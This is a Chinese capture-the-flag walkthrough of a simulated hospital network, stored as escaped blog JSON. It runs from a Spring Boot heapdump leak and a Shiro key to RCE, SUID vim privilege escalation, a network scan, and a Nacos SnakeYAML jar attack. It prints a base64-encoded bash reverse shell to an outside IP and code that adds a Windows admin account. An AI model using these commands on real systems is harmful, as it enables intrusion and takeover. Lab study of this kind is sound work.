goby\u626b\u51fa\u6765\u6709Spring boot actuator unauthorized access\uff0c\u53ef\u4ee5\u770bSpringboot\u4e4bactuator\u914d\u7f6e\u4e0d\u5f53\u7684\u6f0f\u6d1e\u5229\u7528<\/a>\u600e\u4e48\u5229\u7528\uff0c\u53d1\u73b0\u6709heapdump\u6cc4\u9732\u3002\u56e0\u4e3a\u770b\u51fa\u6765\u662fshiro\uff0c\u7136\u540e\u7ffb\u5185\u5b58\uff0c\u53d1\u73b0\u8d26\u53f7\u5bc6\u7801\u662fadmin admin123\uff0c\u5f53\u7136\u767b\u8fdb\u53bb\u6ca1\u5565\u5375\u7528\uff0c\u540e\u9762\u60f3\u7ffbshiro key\uff0c\u76f4\u63a5\u641cg==\u7ed3\u5c3e\u7684\u5b57\u7b26\u4e32(\u770b\u522b\u4eba\u4f6c\u662f\u7528\u7684\u5185\u5b58\u5206\u6790\u5de5\u5177https:\/\/github.com\/whwlsfb\/JDumpSpider\uff0c\u6211\u8fd9\u4e2a\u662f\u7eaf\u9760\u7684\u7ecf\u9a8c)<\/p>\n\n\n\n \u62ff\u5230shiro key\uff1aGAYysgMQhG7\/CzIJlVpR2g==\uff0c\u76f4\u63a5RCE(https:\/\/github.com\/SummerSec\/ShiroAttack2)<\/p>\n\n\n\n \u7136\u540e\u7528\u65c1\u8fb9\u7684\u5185\u5b58\u9a6c\u529f\u80fd\u5199\u9a6c\u8fde\u4e0a\u53bb\uff0c\u5f39shell<\/p>\n\n\n\n vim.basic\u6709suid\u6743\u9650\uff0c\u4f46\u662f\u5fc5\u987b\u6709tty\uff0c\u4e5f\u5c31\u662f\u4ea4\u4e92\u5f0fshell\uff0c\u6700\u7b80\u5355\u7684\u65b9\u6cd5\u5c31\u662f\u8f93\u5165<\/p>\n\n\n\n \u5176\u4ed6\u7684\u5229\u7528\u53ef\u4ee5\u770b\u770b\u5b9e\u73b0\u4ea4\u4e92\u5f0fshell\u7684\u51e0\u79cd\u65b9\u5f0f<\/a>\uff0c\u6211\u8fd9\u91cc\u7528\u7684\u662f\u4e4b\u524d\u540e\u6e17\u900f\u4e4b\u6587\u4ef6\u4e0b\u8f7d(Linux\u7bc7)<\/a>\u91cc\u63d0\u5230\u7684pwncat\u5b9e\u73b0tty\uff0c\u7b80\u76f4\u597d\u7528\u7684\u6279\u7206<\/p>\n\n\n\n \u4e3a\u4e86\u8fdb\u4e00\u6b65\u5229\u7528\uff0c\u8fd9\u91cc\u76f4\u63a5\u7528vim.basic\u5199\u516c\u94a5\u83b7\u5f97root\u6743\u9650\u3002<\/p>\n\n\n\n \u5185\u7f51\u7684172.30.12.6:8848\u662fNacos\uff0c\u53ef\u4ee5\u6253SnakeYaml\uff0c\u4e0b\u4e00\u4e2acharonlight\/NacosExploitGUI<\/a>\uff0c\u628aAwesomeScriptEngineFactory.java\u91cc\u6267\u884c\u7684\u547d\u4ee4\u6539\u6210\u52a0\u4e2a\u7ba1\u7406\u5458\u7528\u6237<\/p>\n\n\n\n \u8fd9\u91cc\u8fd8\u6709\u73b0\u6210\u7684\u6253\u5305bat\uff0c\u633a\u597d\uff0c\u6253\u5305\u540e\u751f\u6210yaml-payload.jar\u3002\u56e0\u4e3aweb1\u5df2\u7ecf\u88ab\u5199\u516c\u94a5\u62ff\u5230root\u6743\u9650\u4e86(\u4e0d\u4f1a\u5199\u516c\u94a5\u7684\u8bdd\u53ef\u4ee5\u770b\u6625\u79cb\u4e91\u5883\u00b7Spoofing<\/a>)\uff0c\u6211\u4eec\u76f4\u63a5\u5f53\u4f5c\u653b\u51fb\u673a\uff0c\u628a\u6253\u5305\u597d\u7684jar\u6587\u4ef6\u4f20\u5230tmp\u76ee\u5f55<\/p>\n\n\n\n \u7136\u540e\u5728tmp\u76ee\u5f55\u8fd0\u884cpython3 -m http.server 80\u5f00\u542fweb\u670d\u52a1\uff0c\u63a5\u7740\u7528NacosExploitGUI<\/a>\u8ba9nacos\u670d\u52a1\u5668\u53bb\u4ece\u8fdc\u7a0b\u670d\u52a1\u5668\u52a0\u8f7d\u6076\u610f\u7684yaml-payload.jar\u5305<\/p>\n\n\n\n \u6210\u529f\u6267\u884c\u7684\u8bdd\u5c31\u53ef\u4ee5\u7528\u6211\u4eec\u6dfb\u52a0\u7684\u8d26\u6237rdp\u4e0a\u53bb\u62ffflag\u4e86<\/p>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-1.png\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F02-4.jpg\")
<\/div><\/figure>\n\n\n\nbash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuMzYueHh4Lnh4eC85MzgzIDA+JjE=}|{base64,-d}|{bash,-i}'<\/code><\/pre>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-3.jpg\")
<\/div><\/figure>\n\n\n\npython -c 'import pty; pty.spawn(\"\/bin\/bash\")'<\/code><\/pre>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-1.jpg\")
<\/div><\/figure>\n\n\n\nvim.basic \/root\/flag\/flag01.txt<\/code><\/pre>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F02-2.jpg\")
<\/div><\/figure>\n\n\n\n.\/fscan -h 172.30.12.5\/24 -hn 172.30.12.5\n\n ___ _\n \/ _ \\ ___ ___ _ __ __ _ ___| | __\n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__| <\n\\____\/ |___\/\\___|_| \\__,_|\\___|_|\\_\\\n fscan version: 1.8.3\nstart infoscan\n(icmp) Target 172.30.12.236 is alive\n(icmp) Target 172.30.12.6 is alive\n[*] Icmp alive hosts len is: 2\n172.30.12.6:139 open\n172.30.12.6:135 open\n172.30.12.236:22 open\n172.30.12.6:8848 open\n172.30.12.236:8009 open\n172.30.12.236:8080 open\n172.30.12.6:445 open\n[*] alive ports len is: 7\nstart vulscan\n[*] NetBios 172.30.12.6 WORKGROUP\\SERVER02\n[*] NetInfo\n[*]172.30.12.6\n [->]Server02\n [->]172.30.12.6\n[*] WebTitle http:\/\/172.30.12.6:8848 code:404 len:431 title:HTTP Status 404 \u2013 Not Found\n[*] WebTitle http:\/\/172.30.12.236:8080 code:200 len:3964 title:\u533b\u9662\u540e\u53f0\u7ba1\u7406\u5e73\u53f0\n[+] PocScan http:\/\/172.30.12.6:8848 poc-yaml-alibaba-nacos\n[+] PocScan http:\/\/172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass<\/code><\/pre>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-15.jpg\")
<\/div><\/figure>\n\n\n\nRuntime.getRuntime().exec(\"net user fushuling qwer1234! \/add\");\nRuntime.getRuntime().exec(\"net localgroup administrators fushuling \/add\")<\/code><\/pre>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-4.jpg\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-16.jpg\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-6.jpg\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-7.jpg\")
<\/div><\/figure>\n\n\n\n
![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-17.jpg\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-8.jpg\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-10.jpg\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-11.jpg\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-18.jpg\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-19.jpg\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-20.jpg\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-21.jpg\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-22.jpg\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-23.jpg\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-24.jpg\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-12.jpg\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-25.jpg\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-13.jpg\")
<\/div><\/figure>\n","protected":false},"excerpt":{"rendered":"